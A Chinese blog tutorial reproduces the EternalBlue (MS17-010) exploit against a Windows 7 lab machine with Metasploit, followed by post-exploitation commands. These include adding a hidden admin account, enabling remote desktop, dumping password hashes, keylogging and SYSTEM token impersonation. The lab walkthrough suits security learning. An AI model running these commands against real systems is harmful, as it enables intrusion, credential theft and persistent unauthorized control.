Win7经典漏洞永恒之蓝复现

环境

工具:metaspoilt

模拟攻击机ip:192.168.2.19

靶机ip:192.168.2.22

信息收集

扫描靶机端口及端口服务版本

nmap -sV 192.168.2.22

在这里插入图片描述445端口开启且版本信息已经显示时windows7版本,永恒之蓝漏洞特征已非常明显

确定漏洞

启动metaspoilt
在这里插入图片描述搜索ms17-010

search ms17-010

在这里插入图片描述
exploit/windows/smb/ms17_010_eternalblue 为攻击模块

auxiliary/scanner/smb/smb_ms17_010 为辅助模块可以扫描目标是否存在永恒之蓝漏洞

进行漏洞扫描

use auxiliary/scanner/smb/smb_ms17_010

查看参数

show options

![在这里插入在这里插入图片描述
RHOSTS参数是必填项,参数为目标ip

set RHOSTS 192.168.2.22

运行

exploit

在这里插入图片描述运行结果

在这里插入图片描述确定有永恒之蓝漏洞

渗透

使用ms17-010攻击模块

use exploit/windows/smb/ms17_010_eternalblue

查看参数

show options

在这里插入图片描述主要参数有

RHOSTS:目标主机ip

LHOST:攻击者ip (程序检测到网卡的ip已自动填写)

LPORT:攻击接收端口(默认为4444,可根据需要更改)

set RHOSTS 192.168.2.22

开始渗透

exploit

在这里插入图片描述渗透成功

渗透成功后一些常用操作

通过Shell对靶机Win7进行控制
创建用户名密码
net user hack 123456 /add
将用户hack添加入管理组
net localgroup administrators hack /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面连接Win7
rdesktop 192.168.2.22

shell交互显示乱码是因为编码不同

chcp 65001

修改编码可解决

获取到session后的常用命令:

help #获取所有可用命令

getuid #获取当前权限

screenshot #截屏

hashdump #获取密码的hash

ps #获取进程列表

sysinfo #获取系统信息

route #获取路由表

getpid #获取当前攻入的进程pid

migrate #将当前后门注入迁移到其他程序

keyscan_start # 开启键盘记录

keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe

download/upload #上传下载文件

keyscan_stop # 监视键盘记录

bg # 回到metasploit界面

令牌操纵
use incognito #heip incognito 查看帮助

list_tokens -u 查看可用的token

impersonate_token “伪造的身份” #假冒token 或者

举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用
execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell

  • 3
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
学习永恒之蓝复现的收获包括以下几点: 首先,在复现过程中,你可以学习到如何利用已有的工具,例如Kali上的工具,来进行复现。这些工具已经为复现做好了准备,帮助你更好地理解攻击的过程和原理,并加深对Kali的使用。 其次,你还可以通过学习永恒之蓝漏洞的利用过程,了解到具体的漏洞利用方法和技巧。永恒之蓝是一种由美国国家安全局开发的漏洞利用程序,针对微软漏洞编号ms17-010。通过学习这个漏洞的利用工具,你可以更深入地了解TCP 445端口(文件分享协议)的攻击方式,以及如何传播病毒木马。 最后,学习永恒之蓝复现还可以帮助你加深对渗透攻击的理解。在复现过程中,你可能会接触到一些以前没见过的命令和技术,这有助于扩展你的知识面,并提升你在渗透测试领域的技能水平。 综上所述,学习永恒之蓝复现的收获包括对Kali工具的深入理解和熟练使用,对漏洞利用方法和技巧的学习,以及对渗透攻击的更深入理解和技能提升。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_54584489/article/details/122374341)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值